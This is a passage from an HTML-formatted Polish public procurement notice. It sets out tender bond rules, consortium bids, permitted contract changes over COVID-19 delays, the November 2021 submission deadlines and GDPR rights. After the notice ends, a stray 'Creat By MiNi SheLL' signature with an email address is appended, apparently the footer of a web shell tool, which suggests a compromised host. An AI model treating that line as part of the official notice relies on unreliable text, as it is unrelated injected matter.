mowa w ust. 3 pkt 1, przed upływem terminu składania ofert.<br/>e) Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt b) tiret 2-4, Wykonawca przekazuje Zamawiającemu przed upływem terminu składania ofert oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>f) Wadium wniesione w formie gwarancji lub poręczenia, o których mowa w pkt b) tiret 2-4 nie może zawierać żadnych ograniczeń sprzecznych z ustawą, w szczególności ograniczenia przyczyn zatrzymania wadium, o których mowa w art. 98 ust. 6 ustawy.<br/>g) Zamawiający odrzuca ofertę, jeżeli Wykonawca nie wniósł wadium, lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy.<br/>h) Przykłady gwarancji wadialnej bankowej i ubezpieczeniowej stanowią odpowiednio Załączniki nr 6 i 7 do SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (m.in. konsorcjum, spółka<br/>cywilna). W takim przypadku: a) Wykonawcy występujący wspólnie są zobowiązani do<br/>ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/>ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. b)<br/>Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z<br/>pełnomocnikiem. c) Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy.2. W przypadku Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia, każdy z Wykonawców składa wraz z ofertą oświadczenie, o których<br/>mowa w art. 125 ust 1 ustawy Pzp. Oświadczenia te potwierdzają brak podstaw wykluczenia<br/>oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu3. W odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>usługi do realizacji których te zdolności są wymagane. 4. W przypadku, o którym mowa w pkt<br/>4.2, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika które usługi wykonają poszczególni Wykonawcy. 5. Wykonawcy<br/>wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający, działając zgodnie z art. 455 ust. 1 pkt 1 przewiduje możliwość zmiany umowy w zakresie przedłużenia terminu wykonania zamówienia, w sytuacjach:<br/>1)	Zamawiający przewiduje realizację umowy (rozpoczęcie) w miesiącu listopadzie 2021 r. przy założeniu że Wykonawca przystąpi do realizacji robót w możliwie najszybszym terminie licząc od dnia zawarcia umowy przy uwzględnieniu procedury o udzielenie zamówienia publicznego, z wyłączeniem zaistnienia sytuacji w której zawarcie umowy byłoby sprzeczne z zasadami współżycia społecznego oraz w której pomimo zawarcia umowy nie jest możliwe prowadzenie robót i innych czynności towarzyszących przedmiotowym robotom budowlanym (zarówno po stronie Zamawiającego, jak i Wykonawcy) wynikających z przedłużającego się okresu trwania epidemii COVID-19 albo trwania związanego z tym stanu wyjątkowego na terytorium RP i wynikających z tego powodu obostrzeń lub ograniczeń stanowionych odpowiednimi aktami prawa lub decyzji administracyjnych. W przypadku wystąpienia opóźnień w przystąpieniu do realizacji zamówienia albo jego ukończenia, wynikających z siły wyższej o której mowa w zdaniu pierwszym, Zamawiający i Wykonawca ustalą harmonogram realizacji uwzględniający możliwości świadczenia roboty budowlanej z tym zastrzeżeniem, że zachowane zostaną ramy czasowe realizacji zamówienia do 21/28/35 dni kalendarzowych licząc od dnia następującego po zawarciu umowy.<br/>2)	Termin 21/28/35 dni kalendarzowych licząc od dnia następującego po zawarciu umowy może ulec przesunięciu także w przypadku wystąpienia:<br/>a)	działania innej siły wyższej niż określona w pkt 4.1), mającej bezpośredni wpływ na terminowość wykonania robót (np. niesprzyjające warunki hydrologiczno-atmosferyczne) wyłącznie w stopniu którego profesjonalnie działający Wykonawca, przy zachowaniu należytej staranności, nie mógł przewidzieć. <br/>b)	wystąpienia okoliczności, których Strony nie były w stanie przewidzieć, pomimo zachowania należytej staranności.<br/>3)	Postanowienia o których mowa w ust. 2 nie znajdują zastosowania w przypadku, gdy oferta Wykonawcy została uznana za najkorzystniejszą z uwagi na zaproponowanie przez niego krótszego terminu wykonania zamówienia za co Wykonawca uzyskał dodatkową punktację na etapie oceny ofert. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-05 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy złożyć za pośrednictwem Platformy zakupowej eB2b pod adresem: https://kowr.eb2b.com.pl/ przy użyciu zakładki „Załączniki”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-05 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dokończenie informacji RODO:7. PRAWA OSÓB, KTÓRYCH DANE DOTYCZĄ Zgodnie z<br/>RODO przysługuje Pani/Panu: 1) prawo dostępu do swoich danych oraz otrzymania ich kopii; 2)<br/>prawo do sprostowania (poprawiania) swoich danych; 3) prawo do usunięcia danych osobowych,<br/>w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku<br/>wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej; 4) prawo do<br/>ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość<br/>skorzystania z tego prawa. Jeżeli chce Pani/Pan skorzystać z któregokolwiek z tych uprawnień,<br/>prosimy o kontakt z Inspektorem Ochrony Danych Osobowych, wskazany w pkt 2 lub pisemnie<br/>na adres korespondencyjny, wskazany w pkt 1. Zgodnie z RODO, każdej osobie, której dane są<br/>przetwarzane przysługuje prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych. 8. ZAUTOMATYZOWANE PODEJMOWANIE DECYZJI W oparciu o Pani/Pana<br/>dane osobowe administrator nie będzie podejmował wobec Pani/Pana zautomatyzowanych<br/>decyzji, w tym decyzji będących wynikiem profilowania. 9. PRZEKAZYWANIE DANYCH POZA<br/>EUROPEJSKI OBSZAR GOSPODARCZY W związku z jawnością postępowania o udzielenie<br/>zamówienia publicznego Pani/Pana dane mogą być przekazywane do państw trzecich (tj.<br/>państwa, które nie należy do Europejskiego Obszaru Gospodarczego obejmującego Unię<br/>Europejską, Norwegię, Liechtenstein i Islandię), z zastrzeżeniem, o którym mowa w punkcie 4.Dokończenie Zmiany umowy:7. W przypadku uznania przez Zamawiającego okoliczności<br/>przedstawionych we wniosku Wykonawcy o którym mowa w ust. 6, zmiany terminów wymagają<br/>formy pisemnej w postaci Aneksu do umowy. 8. W przedstawionych przypadkach wystąpienia<br/>opóźnień o których mowa powyżej, Strony mogą ustalić nowe terminy z tym, że maksymalny<br/>okres przesunięcia terminu realizacji przedmiotu umowy równy będzie okresowi przerwy lub<br/>przestoju, lub czasu występowania działania siły wyższej/przyczyny niezależnej.

Creat By MiNi SheLL
Email: jattceo@gmail.com